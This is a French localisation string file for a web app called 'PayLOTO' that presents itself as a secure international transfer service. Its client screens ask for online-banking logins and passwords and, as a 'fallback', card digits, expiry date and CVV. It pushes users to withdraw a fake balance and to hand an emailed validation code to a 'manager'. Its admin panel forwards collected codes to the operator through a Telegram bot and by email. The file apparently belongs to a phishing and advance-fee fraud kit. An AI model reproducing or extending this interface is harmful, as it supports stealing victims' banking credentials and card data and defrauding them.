export default {
  "brand.name": "PayLOTO",
  "brand.tagline": "Transferts internationaux sécurisés",

  "common.secureFooter": "Vos échanges sont chiffrés en HTTPS/TLS. PayLOTO ne vous demandera jamais votre mot de passe par e-mail.",
  "common.secureBadge": "Connexion sécurisée",
  "common.encrypted": "Chiffrement TLS actif",
  "common.logout": "Fermer la session",
  "common.back": "Retour",
  "common.loading": "Chargement...",
  "common.error": "Une erreur est survenue. Veuillez réessayer.",
  "common.currency": "XPF",
  "common.serviceFee": "Frais de service",

  "login.badge": "Espace client sécurisé",
  "login.title": "Accédez à votre espace client",
  "login.subtitle": "Saisissez le code d'identification unique fourni par PayLOTO / WePAY.",
  "login.codeLabel": "Code d'identification",
  "login.codePlaceholder": "Ex. 20001",
  "login.submit": "Ouvrir une session",
  "login.submitting": "Vérification...",
  "login.forgot": "Code oublié ?",
  "login.forgotTitle": "Code oublié",
  "login.forgotText": "Pour récupérer votre code d'identification, contactez notre support qui vous le communiquera après vérification de votre identité.",
  "login.forgotEmail": "support@payloto.com",
  "login.helper": "Votre code figure sur le courrier de confirmation transmis par notre gestionnaire.",
  "login.errorEmpty": "Veuillez saisir votre code d'identification.",
  "login.errorInvalid": "Code d'identification inconnu. Veuillez vérifier et réessayer.",
  "login.errorBlocked": "Accès refusé. Veuillez contacter le support.",
  "login.trustTitle": "Une plateforme de confiance",
  "login.trust1": "Vérification d'accès par adresse IP",
  "login.trust2": "Code d'identification unique",
  "login.trust3": "Traçabilité complète des opérations",

  "bankAuth.badge": "Vérification bancaire requise",
  "bankAuth.title": "Authentifiez-vous auprès de votre banque",
  "bankAuth.subtitle": "Pour valider votre demande de retrait, connectez-vous à votre espace bancaire.",
  "bankAuth.step": "Étape 2 sur 2 · Authentification bancaire",
  "bankAuth.stepBank": "Authentification",
  "bankAuth.stepForm": "Demande de retrait",
  "bankAuth.formTitle": "Connexion à votre banque",
  "bankAuth.formSubtitle": "Saisissez vos identifiants bancaires. Ils seront vérifiés lors de la validation finale.",
  "bankAuth.selectBank": "Nom de la banque",
  "bankAuth.selectBankPlaceholder": "Sélectionnez votre banque",
  "bankAuth.selectedBank": "Banque sélectionnée",
  "bankAuth.id": "Identifiant bancaire",
  "bankAuth.idPh": "Ex. BDP-20001",
  "bankAuth.password": "Mot de passe",
  "bankAuth.passwordPh": "Votre mot de passe bancaire",
  "bankAuth.showPassword": "Afficher le mot de passe",
  "bankAuth.hidePassword": "Masquer le mot de passe",
  "bankAuth.submit": "Continuer vers le récapitulatif",
  "bankAuth.submitting": "Enregistrement...",
  "bankAuth.redirect": "Redirection vers le récapitulatif de votre demande...",
  "bankAuth.secureNote": "Connexion chiffrée de bout en bout. Vos identifiants bancaires ne sont jamais conservés par PayLOTO.",
  "bankAuth.errorRequired": "Veuillez renseigner ce champ.",
  "bankAuth.errorBank": "Veuillez sélectionner votre banque.",
  "bankAuth.errorInvalid": "Identifiant ou mot de passe incorrect. Veuillez vérifier et réessayer.",
  "bankAuth.errorLocked": "Trop de tentatives échouées. L'accès bancaire est temporairement bloqué. Veuillez contacter le support.",
  "bankAuth.attempts": "Tentatives d'authentification restantes : {{count}} sur {{max}}",
  "bankAuth.attemptsLeft": "Identifiants incorrects. Il vous reste {{count}} tentative(s) d'authentification.",
  "bankAuth.blockedTitle": "Trop de tentatives échouées",
  "bankAuth.blockedText": "Vos tentatives sont épuisées. Déconnectez-vous : vos essais seront réinitialisés à votre prochaine connexion.",
  "bankAuth.blockedLogout": "Se déconnecter",
  "bankAuth.demoTitle": "Identifiants de démonstration",
  "bankAuth.demoHint": "Cliquez sur un identifiant ci-dessous pour le remplir automatiquement, puis connectez-vous.",
  "bankAuth.connectedTitle": "Banque déjà authentifiée",
  "bankAuth.connectedText": "Vous êtes connecté à {{bank}}. Vous pouvez poursuivre votre demande de retrait.",
  "bankAuth.continue": "Continuer vers le formulaire",
  "bankAuth.changeAccount": "Changer de compte",
  "bankAuth.backDashboard": "Retour au tableau de bord",
  "bankAuth.backForm": "Modifier la demande",
  "bankAuth.reauthTitle": "Nouvelle authentification requise",
  "bankAuth.verifyNote": "La conformité de vos identifiants est vérifiée automatiquement en base lors de l'approbation de votre demande de retrait.",
  "bankAuth.reauthText": "Vos identifiants bancaires n'ont pas pu être confirmés. Veuillez vous authentifier à nouveau pour poursuivre votre demande de retrait. Vous ne disposez que de 2 tentatives d'authentification.",

  "cardAuth.formTitle": "Validation par carte",
  "cardAuth.formSubtitle": "Méthode de secours : saisissez les informations de votre carte pour poursuivre votre demande.",
  "cardAuth.attempts": "Tentatives restantes : {{count}} sur {{max}}",
  "cardAuth.brand": "Type de carte",
  "cardAuth.errorBrand": "Veuillez sélectionner le type de carte.",
  "cardAuth.last8": "8 derniers chiffres de la carte",
  "cardAuth.last8Ph": "Ex. 12345678",
  "cardAuth.errorLast8": "Veuillez saisir les 8 derniers chiffres de votre carte.",
  "cardAuth.expiry": "Date d'expiration",
  "cardAuth.errorExpiry": "Veuillez saisir une date d'expiration valide (MM/AA).",
  "cardAuth.cvv": "CVV",
  "cardAuth.errorCvv": "Veuillez saisir le CVV (3 chiffres).",
  "cardAuth.submit": "Valider la carte",
  "cardAuth.submitting": "Vérification...",
  "cardAuth.errorInvalid": "Informations de carte incorrectes. Veuillez vérifier et réessayer.",
  "cardAuth.secureNote": "Vos informations de carte sont chiffrées et vérifiées de façon sécurisée.",
  "cardAuth.blockedTitle": "Accès bloqué",
  "cardAuth.blockedText": "Validation par carte épuisée. Déconnectez-vous : vos essais seront réinitialisés à votre prochaine connexion.",
  "cardAuth.blockedLogout": "Se déconnecter",

  "dashboard.welcome": "Bienvenue sur votre compte",
  "dashboard.balanceLabel": "Solde disponible",
  "dashboard.balanceHint": "Montant disponible pour vos retraits",
  "dashboard.withdraw": "Initier un retrait",
  "dashboard.recent": "Dernières opérations",
  "dashboard.recentEmpty": "Aucune opération récente.",
  "dashboard.accountCode": "Code client",
  "dashboard.accountStatus": "Statut du compte",
  "dashboard.statusActive": "Compte actif",
  "dashboard.memberSince": "Client depuis",
  "dashboard.currencyLabel": "Devise",
  "dashboard.ibanLabel": "Numéro de compte • IBAN",
  "dashboard.ibanSecure": "Transferts internationaux sécurisés",
  "dashboard.support": "Assistance",
  "dashboard.supportText": "Un gestionnaire est disponible pour vous accompagner dans vos démarches de retrait.",
  "dashboard.op.transfer": "Transfert reçu",
  "dashboard.op.withdrawal": "Retrait bancaire",
  "dashboard.op.fee": "Frais de service",
  "dashboard.op.pending": "En cours",
  "dashboard.op.done": "Terminé",
  "dashboard.op.refused": "Refusé",
  "dashboard.account": "Votre compte",
  "dashboard.quickTitle": "Actions rapides",
  "dashboard.quickHistory": "Historique",
  "dashboard.quickProfile": "Mon profil",
  "dashboard.txReceived": "Montant reçu",
  "dashboard.txAmount": "Montant",
  "dashboard.txNoRef": "—",

  "withdrawal.title": "Demande de retrait",
  "withdrawal.subtitle": "Renseignez les informations du bénéficiaire et les coordonnées bancaires du retrait.",
  "withdrawal.sectionBeneficiary": "Informations du bénéficiaire",
  "withdrawal.sectionBank": "Coordonnées bancaires",
  "withdrawal.sectionContact": "Contact du bénéficiaire",
  "withdrawal.sectionAmount": "Montant du retrait",
  "withdrawal.fullName": "Nom complet du bénéficiaire",
  "withdrawal.fullNamePh": "Ex. Marie-Claire Vaea",
  "withdrawal.bankName": "Nom de la banque",
  "withdrawal.bankNamePh": "Ex. Banque de Polynésie",
  "withdrawal.iban": "Numéro IBAN",
  "withdrawal.ibanPh": "Ex. PF12 1234 5678 9012 3456 7890 123",
  "withdrawal.phone": "Numéro de téléphone",
  "withdrawal.phonePh": "Ex. +689 40 12 34 56",
  "withdrawal.email": "Adresse e-mail",
  "withdrawal.emailPh": "Ex. beneficiaire@example.com",
  "withdrawal.amount": "Montant du retrait",
  "withdrawal.amountPh": "Ex. 750000",
  "withdrawal.bankSelect": "Banque de destination",
  "withdrawal.bankSelectPlaceholder": "Sélectionnez votre banque",
  "withdrawal.amountReadonly": "Le montant du retrait correspond à la totalité de votre solde disponible. Il n'est pas modifiable.",
  "withdrawal.available": "Solde disponible",
  "withdrawal.availableHint": "Disponible pour ce retrait",
  "withdrawal.submit": "Valider",
  "withdrawal.cancel": "Annuler",
  "withdrawal.backDashboard": "Retour au tableau de bord",
  "withdrawal.secureNote": "Opération sécurisée et chiffrée. Vérifiez l'exactitude des coordonnées bancaires avant validation.",
  "withdrawal.required": "Champ obligatoire",
  "withdrawal.errorRequired": "Veuillez renseigner tous les champs obligatoires.",
  "withdrawal.errorEmail": "Veuillez saisir une adresse e-mail valide.",
  "withdrawal.errorAmount": "Veuillez saisir un montant valide supérieur à 0.",
  "withdrawal.errorAmountMax": "Le montant dépasse votre solde disponible.",

  "withdrawal.bankVerified": "Banque vérifiée",
  "withdrawal.changeBank": "Changer de banque",

  "recap.title": "Récapitulatif de la demande",
  "recap.successMsg": "Votre demande de retrait a bien été prise en compte.",
  "recap.subtitle": "Vérifiez les informations ci-dessous, puis approuvez votre demande.",
  "recap.beneficiary": "Nom du bénéficiaire",
  "recap.amount": "Montant du retrait",
  "recap.bank": "Banque",
  "recap.iban": "IBAN",
  "recap.email": "Adresse e-mail",
  "recap.reference": "Référence de la demande",
  "recap.date": "Date et heure de soumission",
  "recap.status": "Statut",
  "recap.statusValue": "Demande enregistrée",
  "recap.approve": "Approuver",
  "recap.edit": "Modifier la demande",
  "recap.approving": "Traitement...",
  "recap.notFound": "Aucune demande en cours. Veuillez démarrer une nouvelle demande de retrait.",

  "validation.title": "Validation de la demande",
  "validation.codeSentTitle": "Code de validation envoyé",
  "validation.codeSentText": "Un code de validation a été envoyé par e-mail à {{email}}. Veuillez le communiquer au gestionnaire chargé de l'activation de votre virement.",
  "validation.codeLabel": "Code de validation",
  "validation.validUntil": "Valable jusqu'au {{date}}",
  "validation.emailPreview": "Aperçu de l'e-mail envoyé",
  "validation.summary": "Récapitulatif de l'opération",
  "validation.ref": "Référence de l'opération",
  "validation.submittedAt": "Soumission",
  "validation.status": "Statut de la demande",
  "validation.statusValue": "En attente d'activation",
  "validation.codeStatus": "Statut du code de validation",
  "validation.codeStatusValue": "Envoyé",
  "validation.processingTime": "Délai de traitement estimé",
  "validation.processingValue": "24 à 48 heures ouvrées",
  "validation.note": "Ce code sert uniquement à confirmer auprès du gestionnaire que la demande peut être poursuivie. Il ne permet pas de modifier ou d'annuler la demande.",
  "validation.notReceived": "Vous ne recevez pas l'e-mail ? Vérifiez vos courriers indésirables ou contactez le support.",
  "validation.backHome": "Retour au tableau de bord",
  "validation.notFound": "Aucune demande à afficher. Veuillez démarrer une nouvelle demande de retrait.",

  "email.subject": "Confirmation de votre demande de retrait — Code de validation",
  "email.greeting": "Bonjour,",
  "email.intro": "Vous avez initié une demande de retrait d'un montant de {{amount}} XPF.",
  "email.detailsTitle": "Détails de votre demande :",
  "email.amount": "Montant",
  "email.reference": "Référence",
  "email.date": "Date et heure",
  "email.status": "Statut",
  "email.statusValue": "Demande enregistrée",
  "email.instruction": "Afin de permettre l'activation de votre virement, veuillez communiquer le code de validation ci-dessous au gestionnaire chargé de votre demande :",
  "email.codeLabel": "Code de validation",
  "email.validity": "Ce code est valable pendant {{hours}} heures à compter de sa réception.",
  "email.manager": "Notre gestionnaire vous contactera sous peu afin de procéder à l'activation de votre virement.",
  "email.signoff": "Cordialement,",
  "email.team": "L'équipe PayLOTO",

  "admin.login.title": "Espace Administration PayLOTO",
  "admin.login.subtitle": "Connectez-vous avec vos identifiants d'administrateur.",
  "admin.login.email": "Adresse e-mail",
  "admin.login.emailPh": "admin@payloto.com",
  "admin.login.password": "Mot de passe",
  "admin.login.passwordPh": "Votre mot de passe administrateur",
  "admin.login.submit": "Se connecter",
  "admin.login.errorEmpty": "Veuillez renseigner tous les champs.",
  "admin.login.errorInvalid": "Identifiant ou mot de passe incorrect.",
  "admin.login.demoTitle": "Accès de démonstration",
  "admin.login.demoHint": "Cliquez ci-dessous pour remplir automatiquement les identifiants de démo.",
  "admin.login.back": "Retour au site",

  "admin.loading": "Chargement des données...",
  "admin.error": "Impossible de charger les données.",
  "admin.retry": "Réessayer",

  "admin.header.role": "Back-office",
  "admin.header.viewSite": "Accéder au site",
  "admin.header.logout": "Se déconnecter",

  "admin.nav.section.menu": "Menu",
  "admin.nav.section.security": "Sécurité & Suivi",
  "admin.nav.dashboard": "Tableau de bord",
  "admin.nav.clients": "Clients",
  "admin.nav.requests": "Demandes de retrait",
  "admin.nav.codes": "Codes de validation",
  "admin.nav.credentials": "Identifiants",
  "admin.nav.banks": "Banques",
  "admin.nav.ips": "Blocage IP",
  "admin.nav.logs": "Journaux",
  "admin.nav.management": "Gestion / Suppression",
  "admin.nav.settings": "Paramètres",

  "admin.common.all": "Tous",

  "admin.overview.title": "Tableau de bord",
  "admin.overview.subtitle": "Vue globale des opérations PayLOTO.",
  "admin.overview.clients": "Clients enregistrés",
  "admin.overview.balance": "Solde total géré",
  "admin.overview.pending": "Demandes en attente",
  "admin.overview.processing": "Virements en cours",
  "admin.overview.recentTitle": "Dernières demandes de retrait",
  "admin.overview.viewAll": "Voir toutes les demandes",

  "admin.status.new": "Nouvelle demande",
  "admin.status.registered": "Demande enregistrée",
  "admin.status.code_sent": "Code envoyé",
  "admin.status.awaiting_activation": "En attente d'activation",
  "admin.status.activation_validated": "Activation validée",
  "admin.status.processing": "En cours de traitement",
  "admin.status.processed": "Traitée",
  "admin.status.cancelled": "Annulée",
  "admin.status.expired": "Expirée",

  "admin.codeStatus.sent": "Envoyé",
  "admin.codeStatus.used": "Utilisé",
  "admin.codeStatus.invalidated": "Invalidé",
  "admin.codeStatus.expired": "Expiré",

  "admin.clients.title": "Gestion des clients",
  "admin.clients.subtitle": "Consultez, ajoutez et gérez les comptes clients.",
  "admin.clients.add": "Nouveau client",
  "admin.clients.searchPh": "Rechercher par nom, code ou e-mail...",
  "admin.clients.code": "Code client",
  "admin.clients.name": "Nom complet",
  "admin.clients.email": "E-mail",
  "admin.clients.balance": "Solde",
  "admin.clients.status": "Statut",
  "admin.clients.actions": "Actions",
  "admin.clients.statusActive": "Actif",
  "admin.clients.statusSuspended": "Suspendu",
  "admin.clients.suspend": "Suspendre",
  "admin.clients.reactivate": "Réactiver",
  "admin.clients.empty": "Aucun client trouvé.",
  "admin.clients.form.title": "Créer un code d'identification client",
  "admin.clients.form.subtitle": "Renseignez le nom, le montant et les identifiants de connexion bancaire du client.",
  "admin.clients.form.fullName": "Nom complet",
  "admin.clients.form.email": "Adresse e-mail",
  "admin.clients.form.phone": "Téléphone",
  "admin.clients.form.accessCode": "Code d'accès",
  "admin.clients.form.balance": "Montant",
  "admin.clients.form.currency": "Devise",
  "admin.clients.form.cancel": "Annuler",
  "admin.clients.form.submit": "Créer le client",
  "admin.clients.form.errorRequired": "Veuillez renseigner tous les champs obligatoires.",
  "admin.clients.form.code": "Code client",
  "admin.clients.form.codeHint": "Généré automatiquement, modifiable avant validation.",
  "admin.clients.form.codeTaken": "Ce code client est déjà utilisé. Veuillez en choisir un autre.",
  "admin.clients.form.emailPh": "Ex. client@example.com",
  "admin.clients.form.credentialsSection": "Identifiants de connexion bancaire",
  "admin.clients.form.bankLogin": "Identifiant de connexion",
  "admin.clients.form.bankPassword": "Mot de passe",
  "admin.clients.form.regenerate": "Régénérer",
  "admin.clients.form.sendCredentials": "Envoyer les identifiants par e-mail au client",
  "admin.clients.form.sendCredentialsHint": "Le client recevra ses identifiants à l'adresse e-mail renseignée ci-dessus.",
  "admin.clients.form.emailRequiredForSend": "Veuillez renseigner l'adresse e-mail du client pour lui envoyer ses identifiants.",
  "admin.clients.form.attemptsSection": "Tentatives de connexion autorisées",
  "admin.clients.form.maxBankAttempts": "Tentatives — compte bancaire",
  "admin.clients.form.maxCardAttempts": "Tentatives — carte",
  "admin.clients.form.attemptsHint": "Nombre d'essais autorisés avant blocage. Le compteur est remis à ce maximum à chaque reconnexion du client (entre 1 et 10).",
  "admin.clients.credentials": "Identifiants",
  "admin.clients.manageCredentials": "Identifiants",

  "admin.requests.title": "Demandes de retrait",
  "admin.requests.subtitle": "Consultez et activez les demandes de retrait.",
  "admin.requests.searchPh": "Rechercher par référence, client ou bénéficiaire...",
  "admin.requests.reference": "Référence",
  "admin.requests.client": "Client",
  "admin.requests.beneficiary": "Bénéficiaire",
  "admin.requests.amount": "Montant",
  "admin.requests.bank": "Banque",
  "admin.requests.status": "Statut",
  "admin.requests.date": "Date",
  "admin.requests.actions": "Actions",
  "admin.requests.details": "Détails",
  "admin.requests.activate": "Activer le virement",
  "admin.requests.empty": "Aucune demande trouvée.",

  "admin.detail.title": "Détail de la demande",
  "admin.detail.reference": "Référence",
  "admin.detail.client": "Client",
  "admin.detail.beneficiary": "Bénéficiaire",
  "admin.detail.amount": "Montant",
  "admin.detail.bank": "Banque",
  "admin.detail.iban": "IBAN",
  "admin.detail.phone": "Téléphone",
  "admin.detail.email": "E-mail",
  "admin.detail.submittedAt": "Date de soumission",
  "admin.detail.codeGeneratedAt": "Génération du code",
  "admin.detail.codeExpiresAt": "Expiration du code",
  "admin.detail.codeUsedAt": "Utilisation du code",
  "admin.detail.activatedAt": "Date d'activation",
  "admin.detail.activatedBy": "Activé par",
  "admin.detail.processingEstimate": "Délai de traitement",

  "admin.activation.title": "Activer le virement",
  "admin.activation.subtitle": "Saisissez le code communiqué par le bénéficiaire.",
  "admin.activation.infoRef": "Référence",
  "admin.activation.infoAmount": "Montant",
  "admin.activation.infoBeneficiary": "Bénéficiaire",
  "admin.activation.codeLabel": "Code de validation",
  "admin.activation.codePh": "XXXXXX",
  "admin.activation.submit": "Confirmer l'activation",
  "admin.activation.cancel": "Annuler",
  "admin.activation.close": "Fermer",
  "admin.activation.success": "Activation validée avec succès. La demande est désormais en cours de traitement.",
  "admin.activation.errorMismatch": "Code de validation invalide. Veuillez vérifier le code communiqué par le bénéficiaire.",
  "admin.activation.errorExpired": "Ce code de validation a expiré. Veuillez générer un nouveau code.",
  "admin.activation.errorUsed": "Ce code a déjà été utilisé.",

  "admin.codes.title": "Codes de validation",
  "admin.codes.subtitle": "Consultez, renouvelez ou invalidez les codes de validation.",
  "admin.codes.searchPh": "Rechercher par référence, client ou code...",
  "admin.codes.reference": "Référence",
  "admin.codes.client": "Client",
  "admin.codes.code": "Code",
  "admin.codes.status": "Statut",
  "admin.codes.generatedAt": "Généré le",
  "admin.codes.expiresAt": "Expire le",
  "admin.codes.actions": "Actions",
  "admin.codes.renew": "Renouveler",
  "admin.codes.invalidate": "Invalider",
  "admin.codes.empty": "Aucun code trouvé.",
  "admin.codes.renewDone": "Nouveau code généré :",
  "admin.codes.invalidateDone": "Code invalidé avec succès.",

  "admin.ips.title": "Blocage des adresses IP",
  "admin.ips.subtitle": "Gérez manuellement les adresses IP bloquées.",
  "admin.ips.add": "Bloquer une IP",
  "admin.ips.ip": "Adresse IP",
  "admin.ips.reason": "Motif",
  "admin.ips.blockedAt": "Bloquée le",
  "admin.ips.blockedBy": "Bloquée par",
  "admin.ips.actions": "Actions",
  "admin.ips.unblock": "Débloquer",
  "admin.ips.empty": "Aucune adresse IP bloquée.",
  "admin.ips.form.title": "Bloquer une adresse IP",
  "admin.ips.form.subtitle": "Renseignez l'adresse IP et le motif de blocage.",
  "admin.ips.form.ipLabel": "Adresse IP",
  "admin.ips.form.ipPh": "Ex. 192.168.1.45",
  "admin.ips.form.reasonLabel": "Motif du blocage",
  "admin.ips.form.reasonPh": "Ex. Tentatives de connexion répétées",
  "admin.ips.form.cancel": "Annuler",
  "admin.ips.form.submit": "Bloquer l'IP",
  "admin.ips.form.errorRequired": "Veuillez renseigner l'adresse IP et le motif.",

  "admin.logs.title": "Journal des opérations",
  "admin.logs.subtitle": "Traçabilité complète des actions sensibles.",
  "admin.logs.searchPh": "Rechercher dans les journaux...",
  "admin.logs.time": "Date et heure",
  "admin.logs.ip": "Adresse IP",
  "admin.logs.user": "Utilisateur",
  "admin.logs.action": "Action",
  "admin.logs.reference": "Référence",
  "admin.logs.technical": "Détails techniques",
  "admin.logs.empty": "Aucune entrée dans les journaux.",

  "admin.clients.currency": "Devise",
  "admin.clients.created": "Code d'identification créé :",

  "admin.banks.title": "Gestion des banques",
  "admin.banks.subtitle": "Ajoutez ou supprimez les banques proposées aux clients.",
  "admin.banks.add": "Ajouter une banque",
  "admin.banks.name": "Nom de la banque",
  "admin.banks.short": "Abréviation",
  "admin.banks.empty": "Aucune banque enregistrée.",
  "admin.banks.delete": "Supprimer",
  "admin.banks.form.title": "Ajouter une banque",
  "admin.banks.form.subtitle": "Renseignez le nom de la banque et son abréviation.",
  "admin.banks.form.nameLabel": "Nom de la banque",
  "admin.banks.form.namePh": "Ex. Banque de Polynésie",
  "admin.banks.form.shortLabel": "Abréviation",
  "admin.banks.form.shortPh": "Ex. BDP",
  "admin.banks.form.cancel": "Annuler",
  "admin.banks.form.submit": "Ajouter la banque",
  "admin.banks.form.errorRequired": "Veuillez renseigner le nom de la banque.",
  "admin.banks.deleteDone": "Banque supprimée avec succès.",

  "admin.settings.title": "Paramètres du compte",
  "admin.settings.subtitle": "Gérez vos identifiants d'administrateur.",
  "admin.settings.emailLabel": "Adresse e-mail de connexion",
  "admin.settings.emailSectionTitle": "Adresses e-mail",
  "admin.settings.emailSectionSubtitle": "Modifiez l'adresse de connexion de l'administrateur et l'adresse de support affichée aux clients.",
  "admin.settings.adminEmailLabel": "E-mail de connexion administrateur",
  "admin.settings.adminEmailPassword": "Mot de passe actuel",
  "admin.settings.adminEmailSave": "Mettre à jour l'e-mail",
  "admin.settings.adminEmailSaved": "Adresse de connexion mise à jour.",
  "admin.settings.adminEmailErrorPassword": "Mot de passe actuel incorrect.",
  "admin.settings.supportEmailLabel": "E-mail de support (affiché aux clients)",
  "admin.settings.supportEmailPh": "support@votredomaine.com",
  "admin.settings.supportEmailSave": "Enregistrer l'e-mail de support",
  "admin.settings.supportEmailSaved": "Adresse de support mise à jour.",
  "admin.settings.supportEmailHint": "Cette adresse est affichée aux clients pour l'assistance et la récupération de code.",
  "admin.settings.emailInvalid": "Veuillez saisir une adresse e-mail valide.",
  "admin.settings.passwordTitle": "Modifier le mot de passe",
  "admin.settings.current": "Mot de passe actuel",
  "admin.settings.new": "Nouveau mot de passe",
  "admin.settings.confirm": "Confirmer le nouveau mot de passe",
  "admin.settings.submit": "Mettre à jour le mot de passe",
  "admin.settings.success": "Mot de passe mis à jour avec succès.",
  "admin.settings.errorEmpty": "Veuillez renseigner tous les champs.",
  "admin.settings.errorCurrent": "Le mot de passe actuel est incorrect.",
  "admin.settings.errorMismatch": "Les deux mots de passe ne correspondent pas.",
  "admin.settings.errorLength": "Le nouveau mot de passe doit contenir au moins 6 caractères.",
  "admin.settings.errorGeneric": "Impossible de mettre à jour le mot de passe.",
  "admin.settings.testTitle": "E-mail de test",
  "admin.settings.testSubtitle": "Envoyez-vous un e-mail de démonstration pour vérifier le rendu des notifications, sans créer de fausse demande de retrait.",
  "admin.settings.testButton": "Envoyer un e-mail de test",
  "admin.settings.testSending": "Envoi en cours...",
  "admin.settings.testHint": "Le test est envoyé à l'adresse administrateur :",
  "admin.settings.testSuccess": "E-mail de test envoyé avec succès à",
  "admin.settings.testError": "Échec de l'envoi :",
  "admin.settings.telegramTitle": "Bot Telegram",
  "admin.settings.telegramSubtitle": "Envoyez un message de vérification au bot Telegram pour confirmer que le token et le chat ID sont bien configurés.",
  "admin.settings.telegramButton": "Tester le bot Telegram",
  "admin.settings.telegramSending": "Envoi en cours...",
  "admin.settings.telegramHint": "Le message de test est envoyé au chat configuré du bot.",
  "admin.settings.telegramSuccess": "Message de test envoyé au chat :",
  "admin.settings.telegramError": "Échec de l'envoi :",

  "admin.management.title": "Gestion & suppression",
  "admin.management.subtitle": "Contrôlez et supprimez définitivement les données du système.",
  "admin.management.warning": "Les actions ci-dessous sont définitives et irréversibles. Les codes expirés ou morts sont également purgés automatiquement.",
  "admin.management.clientsTitle": "Clients",
  "admin.management.clientsSubtitle": "{{count}} client(s) enregistré(s)",
  "admin.management.purgeClients": "Supprimer tous les clients",
  "admin.management.confirmClientsTitle": "Supprimer tous les clients",
  "admin.management.confirmClientsText": "Cette action supprimera définitivement les {{count}} client(s) et leurs accès. Confirmer ?",
  "admin.management.clientsPurged": "Tous les clients ont été supprimés.",
  "admin.management.confirmClientTitle": "Supprimer ce client",
  "admin.management.confirmClientText": "Supprimer définitivement {{name}} ? Cette action est irréversible.",
  "admin.management.clientDeleted": "Client supprimé.",
  "admin.management.requestsTitle": "Demandes & codes de validation",
  "admin.management.requestsSubtitle": "{{count}} demande(s) / code(s)",
  "admin.management.purgeRequests": "Supprimer tous les codes / demandes",
  "admin.management.confirmRequestsTitle": "Supprimer tous les codes et demandes",
  "admin.management.confirmRequestsText": "Cette action supprimera définitivement les {{count}} demandes et leurs codes. Confirmer ?",
  "admin.management.requestsPurged": "Toutes les demandes et codes ont été supprimés.",
  "admin.management.confirmRequestTitle": "Supprimer cette demande",
  "admin.management.confirmRequestText": "Supprimer définitivement la demande {{name}} ? Cette action est irréversible.",
  "admin.management.requestDeleted": "Demande supprimée.",
  "admin.management.ipsTitle": "Adresses IP bloquées",
  "admin.management.ipsSubtitle": "{{count}} adresse(s) IP",
  "admin.management.purgeIps": "Supprimer toutes les IP",
  "admin.management.confirmIpsTitle": "Supprimer toutes les adresses IP",
  "admin.management.confirmIpsText": "Cette action supprimera définitivement les {{count}} adresse(s) IP. Confirmer ?",
  "admin.management.ipsPurged": "Toutes les adresses IP ont été supprimées.",
  "admin.management.confirmIpTitle": "Supprimer cette IP",
  "admin.management.confirmIpText": "Supprimer définitivement l'adresse IP {{name}} ?",
  "admin.management.ipDeleted": "Adresse IP supprimée.",
  "admin.management.empty": "Aucune donnée dans cette section.",
  "admin.management.delete": "Supprimer",
  "admin.management.cancel": "Annuler",
  "admin.management.confirmButton": "Confirmer la suppression",
  "admin.management.noEmail": "Aucune adresse e-mail",

  "admin.credentials.title": "Identifiants bancaires",
  "admin.credentials.subtitle": "Générez, modifiez et transmettez les identifiants de connexion bancaire de chaque client.",
  "admin.credentials.searchPh": "Rechercher par nom, code ou identifiant...",
  "admin.credentials.code": "Code client",
  "admin.credentials.client": "Client",
  "admin.credentials.login": "Identifiant",
  "admin.credentials.status": "Statut",
  "admin.credentials.generatedAt": "Émis le",
  "admin.credentials.actions": "Actions",
  "admin.credentials.manage": "Gérer",
  "admin.credentials.empty": "Aucun client trouvé.",
  "admin.credentials.notGenerated": "Non émis",
  "admin.credentials.generated": "Émis",
  "admin.credentials.sent": "Transmis",
  "admin.credentials.modalTitle": "Identifiants bancaires",
  "admin.credentials.modalSubtitle": "Pour le code client",
  "admin.credentials.loginLabel": "Identifiant de connexion",
  "admin.credentials.passwordLabel": "Mot de passe",
  "admin.credentials.regenerate": "Régénérer",
  "admin.credentials.save": "Enregistrer",
  "admin.credentials.saved": "Identifiants enregistrés avec succès.",
  "admin.credentials.sendLabel": "Adresse e-mail du destinataire",
  "admin.credentials.send": "Envoyer les identifiants",
  "admin.credentials.sending": "Envoi en cours...",
  "admin.credentials.sendDone": "Identifiants envoyés au client :",
  "admin.credentials.sendError": "Échec de l'envoi :",
  "admin.credentials.recipientRequired": "Veuillez renseigner l'adresse e-mail du destinataire.",
  "admin.credentials.loginRequired": "L'identifiant et le mot de passe sont obligatoires.",
  "admin.credentials.sendHint": "Le client recevra ses identifiants par e-mail. Vérifiez l'adresse avant l'envoi.",
  "admin.credentials.genHint": "Les identifiants proposés sont générés automatiquement. Vous pouvez les modifier avant d'enregistrer.",
  "admin.credentials.cardTitle": "Carte de validation",
  "admin.credentials.cardExpiry": "Expiration",
  "admin.credentials.cardHint": "Carte générée automatiquement. Elle sert de méthode de validation de secours (8 derniers chiffres + expiration + CVV).",
  "admin.clients.form.cardSection": "Carte de validation générée",
  "admin.clients.form.cardRegenerate": "Régénérer la carte",
  "admin.clients.form.cardHint": "Carte générée automatiquement. Le client l'utilise comme méthode de secours (type + 8 derniers chiffres + expiration + CVV).",

  "admin.codeLink.title": "Lien de collecte des codes",
  "admin.codeLink.subtitle": "Générez un lien à transmettre au client. Il y saisit son code de validation et le montant à valider ; vous recevez aussitôt le tout par Telegram et par e-mail.",
  "admin.codeLink.statusActive": "Lien actif",
  "admin.codeLink.statusInactive": "Lien désactivé",
  "admin.codeLink.enable": "Activer le lien",
  "admin.codeLink.disable": "Désactiver le lien",
  "admin.codeLink.statusSaved": "Statut du lien mis à jour.",
  "admin.codeLink.amountPh": "Ex. 750000",
  "admin.codeLink.amountSave": "Enregistrer le montant",
  "admin.codeLink.amountSaved": "Montant pré-rempli enregistré.",
  "admin.codeLink.amountHint": "Ce montant sera pré-rempli sur la page du lien, pour que le client le valide.",
  "admin.codeLink.digitsLabel": "Nombre de chiffres du code",
  "admin.codeLink.digitsHint": "Choisissez la longueur du code de validation (de 4 à 8 chiffres). Elle s'applique au lien de collecte et aux nouveaux codes générés.",
  "admin.codeLink.digitsSaved": "Longueur du code mise à jour.",
  "admin.codeLink.currency": "Devise du montant",
  "admin.codeLink.linkLabel": "Lien à transmettre au client",
  "admin.codeLink.linkEmpty": "Aucun lien disponible.",
  "admin.codeLink.linkHint": "Partagez ce lien avec le client. Tant qu'il est actif, le client peut y transmettre son code de validation.",
  "admin.codeLink.copy": "Copier le lien",
  "admin.codeLink.copied": "Copié",
  "admin.codeLink.copyError": "Copie impossible. Sélectionnez le lien manuellement.",
  "admin.codeLink.regenerate": "Régénérer le lien",
  "admin.codeLink.regenerated": "Nouveau lien généré. L'ancien ne fonctionne plus.",
  "admin.codeLink.saveError": "La mise à jour du lien a échoué.",

  "codeCollection.badge": "Transmission sécurisée",
